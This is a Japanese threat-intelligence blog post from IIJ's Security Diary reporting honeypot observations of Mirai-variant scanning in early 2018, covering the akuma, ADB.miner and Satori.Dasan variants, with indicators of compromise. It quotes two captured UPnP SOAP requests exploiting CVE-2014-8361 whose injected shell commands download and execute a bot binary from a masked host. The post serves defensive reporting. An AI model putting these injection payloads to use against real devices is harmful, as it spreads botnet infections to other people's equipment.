IIJ-SECT

IIJ

 

Security Diary

HOME > Security Diary > 国内 Mirai 亜種感染機器からのスキャン通信が再び増加 (2018年2-3月の観測状況)

国内 Mirai 亜種感染機器からのスキャン通信が再び増加 (2018年2-3月の観測状況)

前回の記事において、日本国内からの Mirai 亜種によるスキャン通信が大幅に減少していることを報告しました。その後、2月も減少を続けていましたが、3月に入って再び増加に転じたことがわかりました。本記事では IIJ のマルウェア活動観測プロジェクト、MITF のハニーポットにおける 2018年 2-3月の Mirai 亜種の観測状況について報告します。

全体的な状況

fig1

fig2

上のグラフは IIJ のハニーポットに到着した通信 (スキャンのパケット) のうち、Mirai の特徴に合致するものを示しています[1]。期間は 2018年 2月から 3月と、2017年 4月から 2018年 3月について、それぞれ観測データを集計したものです。2017年 11月から 12月頃をピークに徐々に減少を続けていましたが、3月に入ってやや下げ止まりを見せています。

一方、下のグラフはスキャン通信の送信元アドレス数の上位 10ヶ国を国別に示したものです。これは各国における感染機器の数を測る一つの指標となります。他の国が減少を続ける中、日本だけが 3月に入って再び増加する傾向を示しています。なお 2月前半に韓国、ベトナムからの通信が増加していますが、これはこの期間に観測された新たな Mirai 亜種の活動によるものです。詳細は本記事の最後で紹介します。

fig3

タイプ別の亜種の状況

前回および前々回の記事で紹介した 4タイプの亜種 (satori, masuta, akuma, mirai) について、Scanner が telnet でログイン後に送信する文字列を抽出し、これらのタイプ別にその送信元アドレス数の推移を示したものが下のグラフです。

fig4

masuta 系、mirai 系は減少傾向ですが、akuma 系は 3月から増加していることがわかります。akuma 系は以前から 52869/tcp に対して SOAP サービスの脆弱性 (CVE-2014-8361) を利用して感染を拡大しています。2018年 2-3月の期間において、この脆弱性を利用した感染試行としては akuma 系を最も多く観測しています。また akuma 系の送信元アドレスの 7割以上は日本に集中しています。先程のグラフの日本の送信元アドレスの増加は、この akuma 系の増加が主な要因となっています。

以下は現在観測されている akuma 系による 52869/tcp への攻撃例ですが、攻撃手法に大きな変化はありません。1番目のリクエストでボットのバイナリをダウンロードし、2番目のリクエストでバイナリを実行している様子がわかります。(IP アドレスなど一部の情報はマスクしてあります。)

(1)
POST /wanipcn.xml HTTP/1.1
Host: xxx.xxx.xxx.xxx:52869
Content-Length: 617
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-4-amd64
Connection: keep-alive

<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>47450</NewExternalPort>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>44382</NewInternalPort>
<NewInternalClient>`cd /var;wget http://xxx.xxx.xxx.xxx/krt`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>syncthing</NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</u:AddPortMapping>
</s:Body>
</s:Envelope>

(2)
POST /wanipcn.xml HTTP/1.1
Host: xxx.xxx.xxx.xxx:52869
Content-Length: 614
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-4-amd64
Connection: keep-alive

<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>47450</NewExternalPort>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>44382</NewInternalPort>
<NewInternalClient>`cd /var;chmod +x krt;./krt realtek`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>syncthing</NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</u:AddPortMapping>
</s:Body>
</s:Envelope>

この期間に上記の攻撃で観測された akuma 系の検体の一部を以下に示します。

SHA256 ハッシュ

  • 0623efde6bc292f0009b5fffbda54e8a83a0e4d6103b2096b3f8caa6ef5066d1
  • b1638ac2d3c02f2ba6005ff307a945385a88747c5953478b5b2d296bb8295d0f
  • f19cc203e173331021ff3b4c6422187e0dd2600c5dc2569996e881f61e13fd97


ダウンロード元アドレス

  • akumaiotsolutions[.]pw
  • 80.211.168[.]74


2-3月に観測された新たな Mirai 亜種の活動

この期間に観測された Mirai 亜種のうち、特に目立つ活動を示した 2つの亜種について紹介します。

(1) ADB.miner

2月 4日に Netlab 360 が ADB.miner という新たなボットネットの活動について報告しました[2]。このボットは Android Debug Bridge (ADB) が利用する 5555/tcp をスキャン対象とし、Android のデバッグ用インタフェースを通じて感染を行っていました。主な攻撃対象は Android OS を搭載するスマートフォンやスマートテレビ等であり、これまでの Mirai 亜種とは大きく異なりますが、SYN スキャンのコードを Mirai から流用しているため、Mirai 亜種と同じ通信の特徴を有しています。Netlab 360 の報告によると、ADB.miner は対象機器への感染後、XMRig プログラムを利用して、仮想通貨の一つである Monero (XMR) のプールマイニングに参加する機能を持っています[3]

IIJ の観測では 5555/tcp へのスキャン通信の送信元アドレスの 3分の 2以上は、韓国と中国 (香港を含む) に集中しています。また警察庁も 5555/tcp へのアクセスの観測について報告しています[4]

(2) Satori.Dasan

2月 7日から Mirai 亜種の Satori による 52869/tcp へのスキャンと感染試行の活動を観測しました。また 2月 10日から同じく Satori による 8080/tcp へのスキャンと感染試行の活動を観測しました。8080/tcp に対しては、DASAN Networks の WiFi ルータに存在する脆弱性 (CVE-2017-18046)[5] を利用してコマンドを実行し、感染を試みるものでした。Satori のこの新しい検体について、Radware は Satori.Dasan と名付けて詳しく報告しています[6]SHODAN による検索では脆弱性の対象となる DASAN Networks の WiFi ルータの大半はベトナムに存在しており、実際に観測した 8080/tcp へのスキャン通信の送信元アドレスも半分以上がベトナムに集中していました。

なお Satori.Dasan には GoAhead Web Server の複数の脆弱性を利用した 81/tcp への攻撃ペイロードも含まれており、3つの異なる脆弱性を利用して感染拡大を行っていました。利用する脆弱性や機能などは一部異なるものの、前回の記事で紹介した Satori.Coin.Robber と類似する点が Satori.Dasan には多く見られます。Satori.Dasan による感染活動は 2月末にはほぼ収束しています。

下のグラフは、Mirai 亜種によるスキャン通信のうち、上記の ADB.miner と Satori.Dasan がスキャン対象としているポートへの通信の推移を示したものです。本記事の最初のグラフでは、全体としての数が少ないため、いずれもその他として分類しています。このグラフでは 2月前半から後半にかけて、これらの亜種が活発に活動している様子が示されています。なお ADB.miner の活動は 3月末から再び増加する傾向を示しています。

fig5


  1. Mirai および Mirai のコードを流用した亜種の場合、スキャンのパケットにおける TCP の初期シーケンス番号と宛先 IP アドレスが同じになるという特徴があります。 ↩

  2. Early Warning: ADB.Miner A Mining Botnet Utilizing Android ADB Is Now Rapidly Spreading https://blog.netlab.360.com/early-warning-adb-miner-a-mining-botnet-utilizing-android-adb-is-now-rapidly-spreading-en/
    Netlab 360 は 2月 6日に追加でさらに詳しく報告しています。
    ADB.Miner: More Information https://blog.netlab.360.com/adb-miner-more-information-en/ ↩

  3. XMRig 自体は Monero のマイニングに一般的に利用されるものであり、不正なプログラムというわけではありません。 https://github.com/xmrig/xmrig ↩

  4. http://www.npa.go.jp/cyberpolice/detect/pdf/20180312.pdf ↩

  5. JVNDB-2017-012245 Dasan GPON ONT WiFi ルータ H640X デバイスにおけるバッファエラーの脆弱性 https://jvndb.jvn.jp/ja/contents/2017/JVNDB-2017-012245.html ↩

  6. New Satori Botnet Variant Enslaves Thousands of Dasan WiFi Routers | Radware Blog https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/ ↩

-
 
カテゴリー :
セキュリティ事件  
タグ :
IoT   Malware  
この記事のURL :
https://sect.iij.ad.jp/d/2018/04/057113.html